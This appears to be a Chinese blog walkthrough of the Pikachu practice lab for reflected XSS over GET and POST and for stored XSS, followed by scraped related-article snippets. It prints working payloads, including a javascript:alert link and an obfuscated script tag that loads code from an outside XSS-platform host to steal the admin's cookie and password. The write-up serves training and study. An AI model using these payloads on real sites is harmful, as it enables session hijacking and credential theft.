pikachu反射型xss(get、post)、储存型xss
pikachu
反射型xss(get)
在message后输入
<a href="javascript:alert(1)">XSS Test</a>
即可在who is后面看到按钮:XSS Test,点击即可显示出alert的内容1;
反射型xss(post)
界面是输入用户名和密码,尝试将这两栏输入JavaScript弹窗命令,不论是只输入一个表单,还是两个都输入,都没有产生反应,按提示登录后,再尝试提交js的弹窗命令:
发现了提交的request中有cookie,message依然是urlencode的js弹窗命令:
这次post提交就可以看到提交后可以看到弹框命令可以执行了:
在XSS平台中截取下图黄色部分代码提交post请求,代码:
<sCRiPt sRC=//uj.ci/pl5C></sCrIpT>
查看项目内容也一样得到cookie,cookie中的admin以及pw后的urlencode编码的密码就可以被盗取:
储存型xss
提交js命令后依然可以弹出命令
储存型xss
提交js命令后依然可以弹出命令
pikachu反射型xss(get、post)、储存型xss相关推荐
- PhpMyWind储存型XSS漏洞练习(CVE-2017-12984)
0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞.如下图所示,这个就是发生储存型XSS漏洞的代码 0x02 演示 1.第一张图是客户留言时, ...
- XSS注入(1)-两个简单测试理解反射型xss注入和存储型xss注入
XSS注入(1)-两个例子理解反射型xss注入和存储型xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击.它指的是恶意攻击者往Web页 ...
- 记一次挖掘115网盘反射型xss,08xss的储存型xss
记一次对115分站简单绕过过滤继续实现xss,08xss平台也中枪!! 115反射型xss url:http://115.qiye.115.com/disk/?ac=select_public_fil ...
- php抓取%3ctr%3e中指定的数据,程氏舞曲CMSPHP3.0 储存型xss getshell
Author:roker 这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题 官网已经修补了,所以重新下了源码 因为 后台登入 还需要认证码 所以 注入就没看了. 存在 xs ...
- 【漏洞学习——XSS】乐视网存储型XSS
漏洞细节 http://ui.letv.com/ http://bbs.wangjiu.com/forum.php 发贴插入ed2k://|file|test|'+alert(document.coo ...
- 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...
- xss攻击解决方案php项目,php 过滤存储型XSS攻击,_PHP_ 少侠科技
详细内容 最近做的项目被测试测出了存在存储型XSS,至此记录一下,问题出在了 input 框 :payload:"a" οnclick=alert(1)> 也做了一些XSS过 ...
- dvwa_xss_储存型
文章目录 一.xss储存型概念 二.储存型图片演示 三.代码分析 四.dvwa_储存型_演练 五.总结 一.xss储存型概念 黑客发现个人信息或发表文章,等,处存在xss漏洞(并且是储存在数据库中), ...
- XSS攻击,XSS预防(前端安全),XSS练习
XSS攻击,XSS预防(前端安全),XSS练习 文章目录 XSS攻击,XSS预防(前端安全),XSS练习 1:什么是XSS 2:XSS 分类 2.1:存储型 XSS 2.2:反射型 XSS 2.3:D ...
最新文章
- tcp协议不具备的功能是_TCP协议的状态深度解析,你知道的和不知道的都在这篇文章(干货)...
- SAP MM 创建退货类型的公司间STO,报错 -No delivery type for returns processing assigned to item 00010-
- python3.6安装包多大_win10下Python3.6安装、配置以及pip安装包教程
- 一步步开发自己的博客 .NET版(5、Lucenne.Net 和 必应站内搜索)
- 例子---PHP与Form表单之一
- 也谈虚拟化的服务器选型,以及性能考虑
- idea编译android项目,IDEA创建Android项目并反编译APK
- IOMeter安装以及测试
- mysql数据库工资管理系统_数据库课程设计—企业工资管理系统(java版完整代码).doc...
- python 3des加密_python3使用3des加密
- Python——集合运算
- 计算机英语四六级成绩查询,CET成绩查询常见问题答疑-99宿舍
- 为什么说人间值得,因为有这么多美好让我们留恋。金秋十月初九于指南山村 。...
- DLP迈向NG DLP的进化之路
- 最值得用的五款 chrome 插件 Vimium momentum The Great Suspender等 附下载地址。
- 网易邮箱注册界面设计 html
- webservice报错Message part refundRequest was not recognized. (Does it exist in service WSDL?)
- 什么是CPS?数字孪生技术在工业4.0该如何应用?ThingJS
- 【机器学习基础】Scipy(科学计算库) 手把手手把手
- 如何查询网站服务器类型
热门文章
- 2020计算机统考题,2020年7月网络教育统考计算机应用基础模拟题试卷9
- fatal: unable to access ‘https://github.com/xxx‘: GnuTLS recv error (-110): The TLS connection...
- 虚拟机终端输入git clone https://github.com/.......git无反应,或者出现fatal: 无法访问 ‘https://github.com/.....
- 餐饮行业新媒体营销玩法
- 2)MyBatis2(增删改查)
- 使用numpy中的matmul方法计算矩阵乘法
- 用HTML写一段表白代码
- 分布式系统中的通信机制
- BS EN 2825 烟雾密度测定
- TCP 报文各字段解析